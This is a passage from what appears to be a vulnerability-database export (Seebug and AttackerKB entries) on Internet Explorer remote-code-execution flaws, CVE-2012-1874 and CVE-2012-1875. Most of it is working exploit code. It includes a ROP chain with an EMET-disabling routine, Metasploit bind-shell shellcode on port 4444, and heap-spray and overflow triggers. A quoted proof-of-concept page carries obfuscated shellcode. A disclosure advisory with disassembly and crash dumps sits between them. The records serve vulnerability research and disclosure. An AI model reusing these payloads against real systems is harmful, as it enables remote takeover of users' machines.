rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2228408; // POP ECX\r\n var rop = rop.toString(16);\r\n var rop25 = rop.substring(4,8);\r\n var rop26 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1586172; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop27 = rop.substring(4,8);\r\n var rop28 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\r\n var rop = rop.toString(16);\r\n var rop29 = rop.substring(4,8);\r\n var rop30 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 1884912; // PUSH EAX\r\n var rop = rop.toString(16);\r\n var rop31 = rop.substring(4,8);\r\n var rop32 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\r\n var rop = rop.toString(16);\r\n var rop33 = rop.substring(4,8);\r\n var rop34 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\r\n var rop = rop.toString(16);\r\n var rop35 = rop.substring(4,8);\r\n var rop36 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\r\n var rop = rop.toString(16);\r\n var rop37 = rop.substring(4,8);\r\n var rop38 = rop.substring(0,4); // } RET\r\n \r\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\r\n var getmodulew = getmodulew.toString(16);\r\n var getmodulew1 = getmodulew.substring(4,8);\r\n var getmodulew2 = getmodulew.substring(0,4); // } RET\r\n \r\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\r\n var getprocaddr = getprocaddr.toString(16);\r\n var getprocaddr1 = getprocaddr.substring(4,8);\r\n var getprocaddr2 = getprocaddr.substring(0,4); // } RET\r\n \r\n var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING\r\n shellcode+= unescape("%u4141%u4141"); // PADDING\r\n \r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN\r\n shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN\r\n \r\n // EMET disable part 0x01\r\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\r\n shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN\r\n shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\r\n shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u101C%u076d"); // EMET string\r\n shellcode+= unescape("%ue220%u0007"); // EMET offset\r\n shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN\r\n shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN\r\n shellcode+= unescape("%u0000%u0000"); // Zero out ECX\r\n shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\r\n shellcode+= unescape("%u"+rop37+"%u"+rop38); // ADD ESP,0C # RETN\r\n shellcode+= "EMET"; // EMET string\r\n shellcode+= unescape("%u0000%u0000"); // EMET string\r\n // EMET disable part 0x01 end\r\n \r\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP\r\n shellcode+= unescape("%u1024%u0000"); // Size 0x00001024\r\n shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX\r\n shellcode+= unescape("%u0040%u0000"); // 0x00000040\r\n shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX\r\n shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location\r\n shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI\r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX\r\n shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX\r\n shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD\r\n shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n \r\n // EMET disable part 0x02\r\n // Execute the Corbomite bluff to disarm EAF\r\n shellcode+= unescape("%uc0b8%u6d10");\r\n shellcode+= unescape("%u8b07%u8b00");\r\n shellcode+= unescape("%u6800%u10c8");\r\n shellcode+= unescape("%u076d%ud0ff");\r\n shellcode+= unescape("%ud468%u6d10");\r\n shellcode+= unescape("%u5007%uc4b8");\r\n shellcode+= unescape("%u6d10%u8b07");\r\n shellcode+= unescape("%u8b00%uff00");\r\n shellcode+= unescape("%u8bd0%u81f0");\r\n shellcode+= unescape("%uccec%u0002");\r\n shellcode+= unescape("%uc700%u2404");\r\n shellcode+= unescape("%u0010%u0001");\r\n shellcode+= unescape("%ufc8b%uccb9");\r\n shellcode+= unescape("%u0002%u8300");\r\n shellcode+= unescape("%u04c7%ue983");\r\n shellcode+= unescape("%u3304%uf3c0");\r\n shellcode+= unescape("%u54aa%ufe6a");\r\n shellcode+= unescape("%ud6ff%u9090");\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u29eb"); // NOPs\r\n shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW\r\n shellcode+= unescape("%u"+getprocaddr1+"%u"+getprocaddr2); // GetProcAddress\r\n shellcode+= "NTDLL";\r\n shellcode+= unescape("%u0000");\r\n shellcode+= unescape("%u744e%u6553"); // NtSetContextThread\r\n shellcode+= unescape("%u4374%u6e6f");\r\n shellcode+= unescape("%u6574%u7478");\r\n shellcode+= unescape("%u6854%u6572");\r\n shellcode+= unescape("%u6461%u0000");\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n shellcode+= unescape("%u9090%u9090"); // NOPs\r\n // EMET disable part 0x02 end\r\n \r\n // Bind shellcode on 4444 :)\r\n // msf > generate -t js_le\r\n // windows/shell_bind_tcp - 342 bytes\r\n // http://www.metasploit.com\r\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\r\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\r\n // I would keep the shellcode the same size for better reliability :)\r\n \r\n shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +\r\n "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +\r\n "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +\r\n "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +\r\n "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +\r\n "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +\r\n "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +\r\n "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +\r\n "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +\r\n "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +\r\n "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +\r\n "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +\r\n "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +\r\n "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +\r\n "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +\r\n "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +\r\n "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +\r\n "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +\r\n "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +\r\n "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +\r\n "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +\r\n "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +\r\n "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +\r\n "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +\r\n "%u006a%uff53%u41d5");\r\n \r\n // Total spray should be 1000\r\n var padding = unescape("%u9090");\r\n while (padding.length < 1000)\r\n padding = padding + padding;\r\n var padding = padding.substr(0, 1000 - shellcode.length);\r\n \r\n shellcode+= padding;\r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById("132");\r\n leak_col.width = "41";\r\n leak_col.span = "19";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n var hex = str_addr.toString(16);\r\n //alert(hex);\r\n setTimeout(function(){heapspray(str_addr)}, 50);\r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById("132");\r\n evil_col.width = "1245880";\r\n evil_col.span = "44";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 400);\r\nsetTimeout(function(){get_leak()},450);\r\nsetTimeout(function(){trigger_overflow()}, 700);\r\n \r\n</script>\r\n</body>\r\n</html>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87111", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:22:56", "description": "No description provided by source.", "cvss3": {}, "published": "2012-06-14T00:00:00", "type": "seebug", "title": "Microsoft Internet Explorer 8 / 9 Toolbar Code Execution(CVE-2012-1874)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1874"], "modified": "2012-06-14T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60215", "id": "SSV:60215", "sourceData": "\n [CAL-2012-0023]Microsoft IE Developer Toolbar Remote Code Execution Vulnerability\r\n\r\nCVE ID: CVE-2012-1874\r\nhttp://technet.microsoft.com/en-us/security/bulletin/ms12-037\r\nhttp://blog.vulnhunt.com/index.php/2012/06/13/cal-2012-0023microsoft-ie-developer-toolbar-remote-code-execution-vulnerability/\r\n\r\n\r\n1 Affected Products\r\n=================\r\ntested :Internet Explorer 9.0.8112.16421\r\nalso affected IE8\r\n\r\n\r\n2 Vulnerability Details\r\n=====================\r\nCode Audit Labs http://www.vulnhunt.com has discovered a use after free\r\nvulnerability in IE developer toolbar.\r\n\r\nIE developer toolbar register a global console object, and add bulitin\r\nmembers as\r\nCFunctionPointer with reference to console object, but not add reference\r\ncount correctly.\r\nif access console object's property, it return a CFunctionPointer, so it\r\ncause a use after\r\nfree vulnerability, which can cause Remote Code Execution.\r\n\r\n\r\n\r\n3 Analysis\r\n=========\r\nasm in jsdbgui.dll\r\n\r\n.text:1000B172 ; private: void __thiscall\r\nCConsole::AddAllBuiltinMembers(void)\r\n.text:1000B172 ?AddAllBuiltinMembers@CConsole@@AAEXXZ proc near\r\n.text:1000B172 ; CODE XREF:\r\nATL::CComObject<CConsole>::CreateInstance(ATL::CComObject<CConsole> *\r\n*)+62 p\r\n.text:1000B172\r\n.text:1000B172 var_10 = dword ptr -10h\r\n.text:1000B172 var_4 = dword ptr -4\r\n.text:1000B172\r\n.text:1000B172 push 4\r\n.text:1000B174 mov eax, offset loc_10039274\r\n.text:1000B179 call __EH_prolog3\r\n.text:1000B17E mov edi, ecx\r\n.text:1000B180 push 4\r\n.text:1000B182 pop esi\r\n.text:1000B183 push esi ; dwBytes\r\n.text:1000B184 call ??2@YAPAXI@Z ; operator new(uint)\r\n.text:1000B189 pop ecx\r\n.text:1000B18A mov [ebp+var_10], eax\r\n.text:1000B18D and [ebp+var_4], 0\r\n.text:1000B191 test eax, eax\r\n.text:1000B193 jz short loc_1000B1A3\r\n.text:1000B195 push offset aLog ; "log"\r\n.text:1000B19A mov ecx, eax\r\n.text:1000B19C call\r\n??0?$CStringT@GV?$StrTraitATL@GV?$ChTraitsCRT@G@ATL@@@ATL@@@ATL@@QAE@PBG@Z\r\n;\r\nATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>(ushort\r\nconst *)\r\n.text:1000B1A1 jmp short loc_1000B1A5\r\n.text:1000B1A3 ;\r\n---------------------------------------------------------------------------\r\n.text:1000B1A3\r\n.text:1000B1A3 loc_1000B1A3: ; CODE XREF:\r\nCConsole::AddAllBuiltinMembers(void)+21 j\r\n.text:1000B1A3 xor eax, eax\r\n.text:1000B1A5\r\n.text:1000B1A5 loc_1000B1A5: ; CODE XREF:\r\nCConsole::AddAllBuiltinMembers(void)+2F j\r\n.text:1000B1A5 push eax\r\n.text:1000B1A6 or ebx, 0FFFFFFFFh\r\n.text:1000B1A9 push 1\r\n.text:1000B1AB mov ecx, edi\r\n.text:1000B1AD mov [ebp+var_4], ebx\r\n.text:1000B1B0 call\r\n?AddBuiltinMethod@CParentExpando@@IAEXJPAV?$CStringT@GV?$StrTraitATL@GV?$ChTraitsCRT@G@ATL@@@ATL@@@ATL@@@Z\r\n;\r\nCParentExpando::AddBuiltinMethod(long,ATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>\r\n*)\r\n.text:1000B1B5 push esi ; dwBytes\r\n\r\n.text:10021E5B push [ebp+arg_0]\r\n.text:10021E5E mov ecx, edi\r\n.text:10021E60 push esi\r\n.text:10021E61 call\r\n?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z ;\r\nCFunctionPointer::SetMethod(CParentExpando *,long)\r\n.text:10021E66 push [ebp+var_10]\r\n.text:10021E69 mov ecx, esi\r\n.text:10021E6B push [ebp+arg_0]\r\n.text:10021E6E call\r\n?SetValue@CParentExpando@@IAEJJPAUIDispatch@@@Z ;\r\nCParentExpando::SetValue(long,IDispatch *)\r\n.text:10021E73 mov eax, [ebp+var_10]\r\n\r\n.text:1001B29B ; public: void __thiscall\r\nCFunctionPointer::SetMethod(class CParentExpando *, long)\r\n.text:1001B29B ?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z\r\nproc near\r\n.text:1001B29B ; CODE XREF:\r\nCParentExpando::AddBuiltinMethod(long,ATL::CStringT<ushort,ATL::StrTraitATL<ushort,ATL::ChTraitsCRT<ushort>>>\r\n*)+4A p\r\n.text:1001B29B\r\n.text:1001B29B arg_0 = dword ptr 8\r\n.text:1001B29B arg_4 = dword ptr 0Ch\r\n.text:1001B29B\r\n.text:1001B29B mov edi, edi\r\n.text:1001B29D push ebp\r\n.text:1001B29E mov ebp, esp\r\n.text:1001B2A0 mov eax, [ebp+arg_0]\r\n.text:1001B2A3 mov [ecx+8], eax\r\n.text:1001B2A6 mov eax, [ebp+arg_4]\r\n.text:1001B2A9 mov [ecx+0Ch], eax\r\n.text:1001B2AC pop ebp\r\n.text:1001B2AD retn 8\r\n.text:1001B2AD ?SetMethod@CFunctionPointer@@QAEXPAVCParentExpando@@J@Z endp\r\n\r\n\r\n4 Exploitable?\r\n============\r\nif overwrite freed memory with controlled content, combined with heap\r\nspray, can cause remote code execution.\r\n\r\n\r\n5 Crash info:\r\n===============\r\nModLoad: 00110000 001c8000 C:\\Program Files (x86)\\Internet\r\nExplorer\\iexplore.exe\r\n(1564.18e8): Access violation - code c0000005 (!!! second chance !!!)\r\neax=0a1202d0 ebx=0365cc90 ecx=0a0afc70 edx=6e1effff esi=00000000\r\nedi=0365cc48\r\neip=088b0000 esp=0365cbd8 ebp=0365cbf0 iopl=0 nv up ei pl zr na\r\npe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b\r\nefl=00010246\r\n088b0000 ?? ???\r\n0:005> kb 3\r\nChildEBP RetAddr Args to Child\r\nWARNING: Frame IP not in any known module. Following frames may be wrong.\r\n0365cbd4 6e1fb3ac 00000004 0365cc90 003a3718 0x88b0000\r\n0365cbf0 5f69e657 0a1202d0 00000000 00000001\r\njsdbgui!CFunctionPointer::InvokeEx+0xbc\r\n0365cc64 5f658fa8 0365cc90 0365cd48 00000008\r\njscript9!DispatchHelper::GetDispatchValue+0x9d\r\n\r\n\r\n6 TIMELINE:\r\n==========\r\n2012/1/15 code audit labs of vulnhunt.com discover this issue\r\n2012/1/20 we begin analyze\r\n2012/2/20 we comfirmed this is an exploitable vulnerability. report to\r\nMicrosoft\r\n2012/2/21 Microsoft reply got the report.\r\n2012/6/14 Microsoft public this bulletin.\r\n\r\n\r\n7 About Code Audit Labs:\r\n=====================\r\nCode Audit Labs secure your software,provide Professional include source\r\ncode audit and binary code audit service.\r\nCode Audit Labs:" You create value for customer,We protect your value"\r\nhttp://www.VulnHunt.com\r\nhttp://blog.Vulnhunt.com\r\nhttp://t.qq.com/vulnhunt\r\nhttp://weibo.com/vulnhunt\r\nhttps://twitter.com/vulnhunt\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60215", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2021-07-20T20:19:06", "description": "Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka \u201cSame ID Property Remote Code Execution Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nA memory corruption flaw exists in Microsoft Internet Explorer. The program fails to sanitize \nuser-supplied input when handling the Same ID property, resulting in memory corruption. With a \nspecially crafted web page which accesses a deleted object, a context-dependent attacker can \nexecute arbitrary code.\n\n# Discovered by\n\n * Qof VulnHunt for reporting the Same ID Property Remote Code Execution Vulnerability (CVE-2012-1875) \n\n * Qihoo 360 Security Center for working with us on the Same ID Property Remote Code Execution Vulnerability (CVE-2012-1875) \n\n * Yichong Lin of McAfee Labs for working with us on the Same ID Property Remote Code Execution Vulnerability (CVE-2012-1875) \n\n * Google Inc. for working with us on the Same ID Property Remote Code Execution Vulnerability (CVE-2012-1875) \n\n\n# PoC\n\n<http://pastebin.com/raw.php?i=sFqxs4qx>\n \n \n <HTML>\n \n <BODY>\n <title></title>\n <DIV id=testfaild>\n <img id=\"imgTest\" style=\"display:none\">\n <a href=\"javascript:OnTest();\" id=\"MyA\" onClick=\"OnTest();\"><div style=\"background-color:#FFFFFF; width:30; height:40\" id=\"imgTest\" src=\"\" onMouseOver=\"OnTest2();\" onMouseOut=\"OnTest2();\"></div></a>\n </DIV>\n <SCRIPT LANGUAGE=\"JavaScript\">\n function S(dword) {\n var t = unescape;\n var d = Number(dword).toString(16);\n while (d.length < 8) d = '0' + d;\n return t('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));\n }\n function OnTest() {\n var tag = 0x1c1c1c0c;\n var vtable1 = S(tag) + '1234567555555555588888888';\n var divs = new Array();\n for (var i = 0; i < 128; i++) divs.push(document.createElement('div'));\n testfaild.innerHTML = testfaild.innerHTML;\n divs[0].className = vtable1;\n divs[1].className = vtable1;\n divs[2].className = vtable1;\n divs[3].className = vtable1;\n }\n function OnTest2() {\n eval(\"imgTest\").src = \"\";\n }\n function setcookie() {\n var Then = new Date() Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3) document.cookie = \"Cookie1=hellofckworld;expires=\" + Then.toGMTString()\n }\n function readcookie() {\n var cookieString = new String(document.cookie);\n if (cookieString.indexOf(\"hellofckworld\") == -1) {\n return 0\n } else {\n return 1;\n }\n }\n function trigger() {\n var x = document.getElementsByTagName(\"div\");\n var fireOnThis = document.getElementById(\"MyA\");\n if (document.createEvent) {\n evObj = document.createEvent('MouseEvents');\n evObj.iniEvent('click', true, false);\n fireOnThis.dispatchEvent(evObj);\n } else if (document.createEventObject) {\n x[1].fireEvent('onMouseOver');\n fireOnThis.fireEvent('onclick');\n x[1].fireEvent('onMouseOut');\n }\n }\n function main() {\n if (readcookie()) return;\n ConVertData = window[\"\\x75\\x6e\\x65\\x73\\x63\\x61\\x70\\x65\"];\n var vbc = (\"NewYoukv10ebNewYoukv4b5bNewYoukvc933NewYoukvb966NewYoukv01d9NewYoukv3480NewYoukv990bNewYoukvfae2NewYoukv05ebNewYoukvebe8NewYoukvffffNewYoukvcfffNewYoukvcbceNewYoukv50aaNewYoukv12fdNewYoukva9e8NewYoukvef12NewYoukv1295NewYoukv85efNewYoukvc712NewYoukv1291NewYoukvb9e7NewYoukvaf12NewYoukve618NewYoukvaa95NewYoukvab99NewYoukvec99NewYoukvc376NewYoukvc7c6NewYoukvf370NewYoukv9998NewYoukvc099NewYoukv3010NewYoukv9b99NewYoukv9999NewYoukv2010NewYoukv9b9dNewYoukv9999NewYoukv2810NewYoukv9b91NewYoukv9999NewYoukv7012NewYoukv6412NewYoukv9cf3NewYoukv71c0NewYoukv989dNewYoukv9999NewYoukv607bNewYoukvcc12NewYoukv1a99NewYoukv9c5bNewYoukvb872NewYoukv14c2NewYoukv62d4NewYoukvf6f1NewYoukv99f7NewYoukvf199NewYoukvebecNewYoukvf4f5NewYoukvc8cdNewYoukv6612NewYoukv12ccNewYoukv5f75NewYoukvf198NewYoukvc010NewYoukv5f98NewYoukv9cd8NewYoukv665aNewYoukv717bNewYoukv6643NewYoukv6666NewYoukv4112NewYoukv98f3NewYoukv71c0NewYoukv9953NewYoukv9999NewYoukv607bNewYoukv1c14NewYoukv9898NewYoukv9999NewYoukvf1c9NewYoukv9899NewYoukv9999NewYoukvcc66NewYoukv109dNewYoukv651cNewYoukv9999NewYoukv5e99NewYoukv9c1dNewYoukv9898NewYoukv9999NewYoukve9ecNewYoukvf8fdNewYoukv1d5eNewYoukv9c9cNewYoukv9998NewYoukved99NewYoukvb7fcNewYoukv5efcNewYoukv9c1dNewYoukv9890NewYoukv9999NewYoukvfce1NewYoukv9999NewYoukvcc12NewYoukv1a8dNewYoukv9c5bNewYoukvbf72NewYoukv14c2NewYoukv62d4NewYoukv6faaNewYoukvcfcfNewYoukv1c14NewYoukv9898NewYoukv9999NewYoukv14c9NewYoukv81dcNewYoukvcfc9NewYoukv12c8NewYoukvcc66NewYoukv7512NewYoukv985fNewYoukv10f1NewYoukv98c0NewYoukvd85fNewYoukv5a9cNewYoukv7b66NewYoukv4c71NewYoukv6666NewYoukv1266NewYoukv91ccNewYoukv5b1aNewYoukv729cNewYoukvc2aaNewYoukvd414NewYoukvcf62NewYoukv1c12NewYoukv9965NewYoukv9999NewYoukv1c5fNewYoukv9899NewYoukv9999NewYoukv5fbbNewYoukv9c1dNewYoukv9892NewYoukv9999NewYoukv14bbNewYoukv991cNewYoukv9998NewYoukvc999NewYoukv12c8NewYoukvcc66NewYoukv7512NewYoukv985fNewYoukv10f1NewYoukv98c0NewYoukvd85fNewYoukv5a9cNewYoukv7b66NewYoukv5171NewYoukv6666NewYoukv1266NewYoukv9934NewYoukv999bNewYoukv1299NewYoukv9d24NewYoukv999bNewYoukv1299NewYoukv912cNewYoukv999bNewYoukv1299NewYoukv1a7cNewYoukv8975NewYoukv9921NewYoukv6796NewYoukvaae6NewYoukv5a42NewYoukvccc8NewYoukvea12NewYoukv12a5NewYoukv87edNewYoukv9ae1NewYoukvcf6aNewYoukvef12NewYoukv9ab9NewYoukvaa6aNewYoukvd050NewYoukv34d8NewYoukv5a9aNewYoukv74aaNewYoukv2796NewYoukva389NewYoukved4fNewYoukv5891NewYoukv9e54NewYoukv739aNewYoukv72d9NewYoukva268NewYoukvecb6NewYoukvc77eNewYoukvf712NewYoukv9abdNewYoukvff72NewYoukvd512NewYoukv99d4NewYoukvf712NewYoukv9a85NewYoukv1272NewYoukv14ddNewYoukv9a99NewYoukv325aNewYoukvc0c4NewYoukv715aNewYoukv6708NewYoukv6666NewYoukvedabNewYoukv9508NewYoukv7ba0NewYoukv1ae4NewYoukvb6c8NewYoukv983bNewYoukvfc39NewYoukv520eNewYoukv10faNewYoukvd648NewYoukv4f19NewYoukv0336NewYoukvedf1NewYoukve9edNewYoukvb6a3NewYoukveeb6NewYoukveeeeNewYoukvefb7NewYoukvf5f0NewYoukvf8f5NewYoukvfefeNewYoukvf4f0NewYoukvf7f8NewYoukvf8f0NewYoukvf0b7NewYoukvb6edNewYoukvf4f0NewYoukvb6feNewYoukvf6fbNewYoukvf2f6NewYoukvb7eaNewYoukvf8faNewYoukv99fb\");\n var xbc = ConVertData(vbc.replace(/NewYoukv/g, \"%u\"));\n var a = new Array();\n var ls = 0x100000 - (xbc.length * 2 + 0x01020);\n var bc = S(0x1c1c1c0c);\n var pad = S(0x1c1c1c0c);\n while (pad.length < 0x3000) pad += pad;\n bc = pad.substring(0, (0x1c0c - 0x24) / 2);\n var language;\n if (navigator.appName == 'Netscape') language = navigator.language;\n else language = navigator.browserLanguage;\n var myStr = (\"NewYoukvef5bNewYoukv77c1NewYoukvf519NewYoukv77c1NewYoukv1118NewYoukv77c1NewYoukv3e25NewYoukv77c2NewYoukv746aNewYoukv77c3NewYoukv1c8cNewYoukv1c1cNewYoukv1c8cNewYoukv1c1cNewYoukv1000NewYoukv0000NewYoukv0040NewYoukv0000NewYoukv1c4cNewYoukv1c1cNewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv0000NewYoukv5ed5NewYoukv77c1NewYoukv9090NewYoukv9090NewYoukv9090NewYoukv9090NewYoukv9090NewYoukv9090\");\n myStr = ConVertData(myStr.replace(/NewYoukv/g, \"%u\"));\n bc += myStr;\n bc += xbc;\n bc += S(0) + S(0);\n var b = S(0x1c1c1c0c);\n while (b.length < 0x10000) {\n b += b;\n }\n bc = bc + b;\n b = bc.substring(0, 0x10000 / 2);\n while (b.length < ls) {\n b += b;\n }\n var lh = b.substring(0, ls / 2);\n delete b;\n delete pad;\n lh = lh + xbc;\n for (var i = 0; i < 0x1c0; i++) a[i] = lh.substr(0, lh.length);\n setTimeout(\"trigger();\", 1000);\n setcookie();\n }\n main();\n </SCRIPT>\n </BODY>\n \n </HTML>\n \n\n# Details\n\nCrash\n \n \n (a9c.998): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n *** ERROR: Symbol file could not be found. Defaulted to export\n symbols for C:\\WINDOWS\\system32\\mshtml.dll -\n eax=1c1c1c0c ebx=00000000 ecx=02fdf588 edx=00000001 esi=02fdf588 edi=020bbaf0\n eip=6363fcc6 esp=020bba88 ebp=020bba94 iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\n mshtml!DllGetClassObject+0xafd09:\n 6363fcc6 8b5070 mov edx,dword ptr [eax+70h]\n ds:0023:1c1c1c7c=????????\n \n\nSPRAY HOW TO\n \n \n 0:008> db 1c1c1024 L1000\n 1c1c1024 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\n .\n .\n .\n 